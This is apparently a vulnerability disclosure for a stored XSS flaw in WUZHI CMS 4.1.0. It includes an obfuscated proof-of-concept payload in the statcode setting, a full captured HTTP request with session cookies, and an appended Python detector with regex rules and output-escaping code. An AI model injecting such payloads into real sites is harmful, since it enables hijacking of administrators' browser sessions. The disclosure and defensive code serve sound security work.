Vulnerability description
An XSS vulnerability was discovered in WUZHI CMS 4.1.0.
There is a persistent XSS vulnerability that allows remote attackers to inject arbitrary web script or HTML via the form[statcode] parameter in a POST to /wuzhicms/www//index.php?m=core&f=set&v=basic&_menuid=22&_su=wuzhicms
PoC
XSS payload: <details/open/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>
Vulnerability trigger point
POST /index.php?m=core&f=set&v=basic&_menuid=22&_su=wuzhicms HTTP/1.1
Host: wuzhicms.jas0nwhy.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://wuzhicms.jas0nwhy.top/index.php?m=core&f=set&v=basic&_menuid=22&_su=wuzhicms
Content-Type: application/x-www-form-urlencoded
Content-Length: 885
Cookie: uFF_qkey=OL%2FPYWtPocjUysJ4eGv17OtY2yAFbrhi; uFF_truename=test; uFF_auth=v%2B5dKnQ11JePhw%2FSGWmMAfDyiW6dNpSOA6SqEty0kRwKW3G%2B6BcsRkJNPpYfUHI73dbdRX9ED02vJTVLfTMoUM9ubgPIlGi3oeDySn4fwUllsGN68ZKsIg%3D%3D; uFF__uid=uxA4c2PBBY82ZXh9mKvwfA%3D%3D; uFF__username=qmwWA1qdk4cLcHywp%2FpCTA%3D%3D; uFF__groupid=kTmiMGl374drFAogceF61w%3D%3D; uFF_modelid=10; uFF_search_cookie=hiIS00B0niHSbqcNh80buiJrVtKUEeTzMtMTtI4hsL2eb7T7a6i5Zk8YNhUcZQgjGWkuSpy2Ae8%3D; PHPSESSID=3nmql0bilkvr1ggiv4ls5j3bd0; uFF_uid=M3HRuLTTk0YN0EMJEsyodQ%3D%3D; uFF_username=aYPt3Efwbdqjo1iqCRUoYA%3D%3D; uFF_wz_name=gRUcj4a9fqr9gfoB2p24hA%3D%3D; uFF_siteid=zs4amrXx%2Bfkw9jT79BFwjA%3D%3D
Connection: keep-alive
Upgrade-Insecure-Requests: 1

form%5Bsitename%5D=test&form%5Bseo_keywords%5D=test&form%5Bseo_description%5D=&weburl=http%3A%2F%2Fwuzhicms.jas0nwhy.top%2F&form%5Blogo%5D=&form%5Blogo2%5D=&form%5Bcopyright%5D=Copyright+%C2%A9+2017+%E5%8C%97%E4%BA%AC%E4%BA%94%E6%8C%87%E4%BA%92%E8%81%94%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8+All+Rights+Reserved%3Cbr%3E%E4%BA%ACICP%E5%A4%8714036160%E5%8F%B7-1&form%5Bstatcode%5D=%3Cdetails%2Fopen%2Fontoggle%3Deval%28String.fromCharCode%2897%29%2BString.fromCharCode%28108%29%2BString.fromCharCode%28101%29%2BString.fromCharCode%28114%29%2BString.fromCharCode%28116%29%2BString.fromCharCode%2840%29%2BString.fromCharCode%2850%29%2BString.fromCharCode%2841%29%29%3E&form%5Baccess_authority%5D=0&form%5Bclose%5D=0&form%5Bclose_reason%5D=%E7%AB%99%E7%82%B9%E5%8D%87%E7%BA%A7%E4%B8%AD%EF%BC%8C%E8%AF%B7%E7%A8%8D%E5%90%8E%E8%AE%BF%E9%97%AE%EF%BC%81&submit=%E6%8F%90%E4%BA%A4
When an administrator accesses the CMS home page, it triggers an XSS vulnerability.
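An added example, not part of the original report and not WUZHI CMS code: a check over the decoded form body that flags fields carrying markup with inline event handlers, together with the output encoding that makes the stored value inert when it is written into a page. The function names, rule names and the two-field sample body (cut down from the request above) are assumptions of this sketch.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample: the sitename and statcode fields from the request body
# in the report, kept in their original URL-encoded form.
SAMPLE_BODY = (
    "form%5Bsitename%5D=test&form%5Bstatcode%5D=%3Cdetails%2Fopen%2Fontoggle%3Deval%28"
    "String.fromCharCode%2897%29%2BString.fromCharCode%28108%29%2B"
    "String.fromCharCode%28101%29%2BString.fromCharCode%28114%29%2B"
    "String.fromCharCode%28116%29%2BString.fromCharCode%2840%29%2B"
    "String.fromCharCode%2850%29%2BString.fromCharCode%2841%29%29%3E"
)

# Hypothetical rule set. "/" is accepted as an attribute separator because
# the reported payload uses <details/open/ontoggle=...> with no whitespace.
RULES = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "inline-event-handler": re.compile(r"<[a-z][^>]*?[\s/]on[a-z]+\s*=", re.I),
    "js-eval": re.compile(r"\b(?:eval|String\.fromCharCode)\s*\(", re.I),
}


def scan_form(body: str) -> dict:
    """Return {field: [matched rule names]} for fields that trip a rule."""
    findings = {}
    # parse_qs percent-decodes names and values, so rules see the real markup.
    for field, values in parse_qs(body).items():
        hits = [name for name, rx in RULES.items()
                if any(rx.search(v) for v in values)]
        if hits:
            findings[field] = hits
    return findings


def render_safe(value: str) -> str:
    """Encode a stored setting before writing it into an HTML text context."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for field, hits in scan_form(SAMPLE_BODY).items():
        print(f"{field}: {', '.join(hits)}")
    stored = parse_qs(SAMPLE_BODY)["form[statcode]"][0]
    print(render_safe(stored))
```

Input matching of this kind is a detection aid for logs or a WAF rule; the fix for stored XSS is the encoding step at output, since pattern lists can be bypassed.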